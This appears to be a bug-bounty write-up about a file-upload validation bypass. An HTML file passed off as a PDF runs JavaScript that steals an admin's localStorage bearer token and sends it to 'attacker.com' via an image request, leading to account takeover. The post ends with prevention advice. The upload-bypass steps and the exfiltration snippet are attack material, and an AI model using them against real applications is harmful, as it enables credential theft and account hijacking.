From Uploading a “PDF” To Owning The Admin Account

From Uploading a "PDF" To Owning The Admin Account💀 | by Rehan Ansari - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original From Uploading a "PDF" To Owning The Admin Account💀 How a Tiny Upload Bug Turned into a Full-Admin Account Takeover Rehan Ansari Follow ~3 min read · April 5, 2026 (Updated: April 5, 2026) · Free: Yes 🎬 The Story Begins… Imagine this 👇 You're testing an application. Everything looks normal. Upload feature? File restrictions? Admin review workflow? Nothing screams critical vulnerability . But deep inside this " Normal " feature… a silent attack chain is waiting to happen. And all it takes… is one file upload. Attack Summary : File Upload → HTML Injection → Token Theft → Admin Account Takeover👑 Phase 1: The "Secure" Upload Feature The application only allowed file types: JPG PNG PDF Anything else? ❌ Rejected instantly At this point, most people move on. But here's the mindset shift 👇 "What if I don't break the rules… but bend them?" Phase 2: Bypassing File Upload Validation Using Burp Suite , I intercepted the upload request. Instead of fighting validation… we manipulate it . Upload a legit PDF file Intercept request in Burp Modify: Filename: file.pdf → file.html Content-Type: application/pdf → text/html Delete PDF content Inject malicious HTML Forward request Result? Server happily accepts our " File as HTML! " No alarms. No errors. No validation. Why This Was Possible : Because the backend trusted: File extension Content-Type header Instead of: Actual file content Magic byte validation Phase 3: Finding the Real Gold Now comes the real question: "What can we steal?" The application uses: 🔐 Bearer Token Authentication Stored in: localStorage Key name: userTokenDetail This is a jackpot because anything in localStorage can be accessed via JavaScript and that's where things get interesting… 👀 Phase 4: Weaponizing the Upload We upload this malicious HTML file: What This Payload Actually Does : Let's decode what's happening here 👇 🔹 Self-Executing Function (function() { ... })(); Runs automatically when the file is opened No user interaction required 🔹 Extracting Local Storage JSON.stringify(localStorage) Converts all stored data into string format 🔹 Encoding Data btoa(...) Encodes data in Base64 Makes it safe to send via URL 🔹 Data Exfiltration Trick new Image().src = "https://attacker.com/?data=" + data; Creates an invisible image request Sends stolen data to attacker server No CORS issues, no alerts Step 4: The Real Attack Flow Now comes the interesting part — how we reached admin takeover. Step A: Attacker Uploads Malicious File Uploads HTML disguised as PDF File gets stored successfully Step B: Application Workflow The app has a feature: Uploaded documents go to Admin for validation Step C: Admin Reviews the File Admin logs in Opens uploaded file Browser executes malicious JavaScript Step D: Token Theft Script extracts: userTokenDetail Sends it to attacker server Step E: Account Takeover Attacker now: Opens browser Inserts stolen token into localStorage Accesses application Admin account successfully hijacked How to Prevent This : 1. Strong File Validation Validate file type using magic bytes Do not trust extensions or headers 2. Store Files Securely Serve files as download Content-Disposition: attachment Never render user-uploaded HTML 3. Implement CSP Content-Security-Policy: default-src 'self'; Blocks data exfiltration attempts 4. Sanitize Uploads Block .html , .js , .svg Scan uploaded content Key Takeaways : Never trust file uploads Never store sensitive data in localStorage Always think in attack chains , not single bugs Final Thoughts : This attack is a classic example of: From just uploading a file → To executing JavaScript → To stealing tokens → To owning the admin If you're a Pentester: Always test file uploads beyond extensions If you're a developer: Your upload feature might be your biggest risk If you found this blog interesting, it shows how dangerous "small" bugs can become when chained together. What started as a simple file upload turned into a full admin account takeover and that's exactly how real-world attacks happen. If you're into web security, Pentesting or bug bounty hunting always go beyond the obvious and think like an attacker because the real impact lies in connecting the dots. If you enjoyed this write-up, feel free to share it with your network and follow for more real-world vulnerability breakdowns 🔥 #CyberSecurity #WebSecurity #Pentesting #BugBounty #InfoSec #EthicalHacking #XSS #AccountTakeover #ApplicationSecurity #RedTeam #BlueTeam#BugBountyHunter #SecurityResearch #OWASP #InfosecCommunity #account-takeover #stored-xss #file-upload-vulnerability #owasp #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).